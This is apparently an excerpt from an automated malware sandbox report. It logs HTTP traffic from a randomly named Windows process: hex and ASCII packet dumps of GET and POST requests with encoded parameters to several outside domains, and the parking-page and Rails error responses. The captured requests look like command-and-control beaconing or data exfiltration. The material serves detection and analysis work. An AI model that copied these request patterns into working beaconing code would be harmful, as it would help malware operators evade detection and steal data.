                                                                            Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                            Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.549894217.160.0.132801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:38.658546925 CET532OUTGET /8u3q/?UTJ0bhC=cm4ubz77/lIwMrhkdRh+pZgL/Bl5XR/XxQMTOGkT00YioQcuvl4ad7FbuK2ZVTUxGoXbXPFIPc1cKkfmvUrJch/nk290kcPG1JSPbhB/GQRlqu+N9s0n8p9+2HNGTNszmQ==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.astrext.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:24:39.938147068 CET1236INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 1271
                                                                            Connection: close
                                                                            Date: Tue, 10 Dec 2024 15:24:39 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                            Dec 10, 2024 16:24:39.938679934 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a
                                                                            Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.549911216.40.34.41801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:46.054102898 CET797OUTPOST /f83s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.newhopetoday.app
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.newhopetoday.app
                                                                            Referer: http://www.newhopetoday.app/f83s/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 59 67 32 71 35 6f 5a 2f 5a 6f 4b 6f 59 50 65 79 67 7a 31 6b 6f 58 31 2b 74 4b 73 64 70 6d 49 51 72 43 45 30 58 4a 54 64 62 4e 70 6f 50 6b 4b 5a 6f 66 50 69 2f 69 38 6f 45 66 62 35 58 37 36 66 54 48 65 64 44 75 63 56 70 35 4b 4f 44 39 76 55 34 45 33 57 4a 34 5a 4b 43 38 6e 4c 71 37 52 56 47 34 79 48 2b 72 42 56 4c 77 74 68 45 6c 50 33 77 35 63 74 36 55 34 54 67 71 5a 49 70 32 6f 57 75 43 58 50 71 6f 4f 4d 78 6b 42 7a 4c 43 4e 58 4e 30 6f 59 37 47 2b 64 6b 78 64 62 65 53 70 6f 61 45 43 4c 62 73 33 43 70 45 36 6b 5a 6f 7a 55 35 4b 74 77 71 4d 47 79 73 2f 53 6d 45 39 64 49 6c 44 6a 37 36 43 38 3d
                                                                            Data Ascii: UTJ0bhC=Yg2q5oZ/ZoKoYPeygz1koX1+tKsdpmIQrCE0XJTdbNpoPkKZofPi/i8oEfb5X76fTHedDucVp5KOD9vU4E3WJ4ZKC8nLq7RVG4yH+rBVLwthElP3w5ct6U4TgqZIp2oWuCXPqoOMxkBzLCNXN0oY7G+dkxdbeSpoaECLbs3CpE6kZozU5KtwqMGys/SmE9dIlDj76C8=
                                                                            Dec 10, 2024 16:24:47.191873074 CET1236INHTTP/1.1 404 Not Found
                                                                            content-type: text/html; charset=UTF-8
                                                                            x-request-id: 679f2543-3481-4a3d-a4e3-5e9e2ad5c117
                                                                            x-runtime: 0.029777
                                                                            content-length: 17134
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                            Dec 10, 2024 16:24:47.192409992 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                            Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                                            Dec 10, 2024 16:24:47.192423105 CET448INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                                            Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                                            Dec 10, 2024 16:24:47.193926096 CET1236INData Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74
                                                                            Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
                                                                            Dec 10, 2024 16:24:47.193939924 CET1236INData Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f
                                                                            Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Framework Trace</a> |
                                                                            Dec 10, 2024 16:24:47.196099043 CET1236INData Raw: 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 72 65 71 75 65 73 74 5f 73 74 6f 72 65 20 28 31 2e 35 2e 30 29 20 6c 69
                                                                            Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
                                                                            Dec 10, 2024 16:24:47.196110964 CET1236INData Raw: 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 35 22 20 68 72 65
                                                                            Data Ascii: uration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:
                                                                            Dec 10, 2024 16:24:47.198530912 CET1236INData Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61
                                                                            Data Ascii: patch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpac
                                                                            Dec 10, 2024 16:24:47.198549032 CET1236INData Raw: 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72
                                                                            Data Ascii: e-id="14" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="16
                                                                            Dec 10, 2024 16:24:47.200855017 CET1236INData Raw: 65 20 3d 20 74 61 72 67 65 74 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 68 61 6e 67 65 20 74 68 65 20 65 78 74 72 61 63 74 65 64 20 73 6f 75 72 63 65 20 63 6f 64 65 0a 20 20 20 20 20 20 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61
                                                                            Data Ascii: e = target; // Change the extracted source code changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (current
                                                                            Dec 10, 2024 16:24:47.313241959 CET1236INData Raw: 20 20 3c 74 62 6f 64 79 20 63 6c 61 73 73 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 20 69 64 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 3e 0a 20 20 3c 2f 74 62 6f 64 79 3e 0a 20 20 3c 74 62 6f 64 79 3e 0a 20 20 20 20 3c 74 72 20 63 6c
                                                                            Data Ascii: <tbody class='fuzzy_matches' id='fuzzy_matches'> </tbody> <tbody> <tr class='route_row' data-helper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </td> <td data-route-pat


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.549917216.40.34.41801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:48.716372013 CET817OUTPOST /f83s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.newhopetoday.app
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.newhopetoday.app
                                                                            Referer: http://www.newhopetoday.app/f83s/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 59 67 32 71 35 6f 5a 2f 5a 6f 4b 6f 65 66 75 79 76 30 70 6b 74 33 31 39 70 36 73 64 67 47 49 55 72 43 59 30 58 4d 72 4e 62 37 35 6f 4d 42 75 5a 76 61 6a 69 34 69 38 6f 51 76 62 38 49 72 36 57 54 48 69 7a 44 71 55 56 70 36 32 4f 44 34 72 55 34 31 33 58 49 6f 5a 4d 62 73 6e 4a 6b 62 52 56 47 34 79 48 2b 72 56 7a 4c 77 6c 68 45 57 58 33 7a 59 64 66 6b 45 34 53 6e 71 5a 49 69 57 6f 61 75 43 58 74 71 70 69 32 78 6e 35 7a 4c 48 78 58 4b 68 45 66 31 32 2b 66 71 52 63 54 51 68 55 77 53 46 32 32 52 4f 47 43 33 45 6d 51 59 65 43 2b 6a 6f 6c 59 35 73 71 4b 38 73 61 52 56 4e 38 68 2f 67 7a 4c 6b 56 72 38 33 55 50 57 73 70 69 75 62 42 71 38 32 68 38 4f 32 63 67 51
                                                                            Data Ascii: UTJ0bhC=Yg2q5oZ/ZoKoefuyv0pkt319p6sdgGIUrCY0XMrNb75oMBuZvaji4i8oQvb8Ir6WTHizDqUVp62OD4rU413XIoZMbsnJkbRVG4yH+rVzLwlhEWX3zYdfkE4SnqZIiWoauCXtqpi2xn5zLHxXKhEf12+fqRcTQhUwSF22ROGC3EmQYeC+jolY5sqK8saRVN8h/gzLkVr83UPWspiubBq82h8O2cgQ
                                                                            Dec 10, 2024 16:24:49.853225946 CET1236INHTTP/1.1 404 Not Found
                                                                            content-type: text/html; charset=UTF-8
                                                                            x-request-id: b48f66f8-e84b-437c-80bf-e31ef0255395
                                                                            x-runtime: 0.021908
                                                                            content-length: 17154
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                            Dec 10, 2024 16:24:49.853595018 CET224INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                            Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source {
                                                                            Dec 10, 2024 16:24:49.853606939 CET1236INData Raw: 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20
                                                                            Data Ascii: border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; background-colo
                                                                            Dec 10, 2024 16:24:49.854933023 CET1236INData Raw: 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20
                                                                            Data Ascii: e: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches { background
                                                                            Dec 10, 2024 16:24:49.854944944 CET1236INData Raw: 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 66 38 33 73 26 71 75 6f 74 3b 3c 2f 68 32 3e
                                                                            Data Ascii: /header><div id="container"> <h2>No route matches [POST] &quot;/f83s&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#
                                                                            Dec 10, 2024 16:24:49.857290030 CET1236INData Raw: 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23
                                                                            Data Ascii: data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:28:in `call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="tr
                                                                            Dec 10, 2024 16:24:49.857301950 CET1236INData Raw: 65 2e 72 62 3a 31 31 30 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 33 22 20 68 72 65 66 3d 22 23 22 3e
                                                                            Data Ascii: e.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br><a class="trace-frames" data-frame-id="14" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `
                                                                            Dec 10, 2024 16:24:49.859184980 CET1236INData Raw: 20 60 63 61 6c 6c 5f 61 70 70 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73
                                                                            Data Ascii: `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:28:in `call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/re
                                                                            Dec 10, 2024 16:24:49.859204054 CET1236INData Raw: 2d 69 64 3d 22 31 32 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 73 65 6e 64 66 69 6c 65 2e 72 62 3a 31 31 30 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c
                                                                            Data Ascii: -id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br><a class="trace-frames" data-frame-id="14" href="#">
                                                                            Dec 10, 2024 16:24:49.861547947 CET1236INData Raw: 72 20 66 72 61 6d 65 5f 69 64 20 3d 20 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 66 72 61 6d 65 49 64 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 73 65 6c 65 63 74 65 64 46 72 61 6d 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63
                                                                            Data Ascii: r frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); } target.className += " selected"; selectedFrame = target;
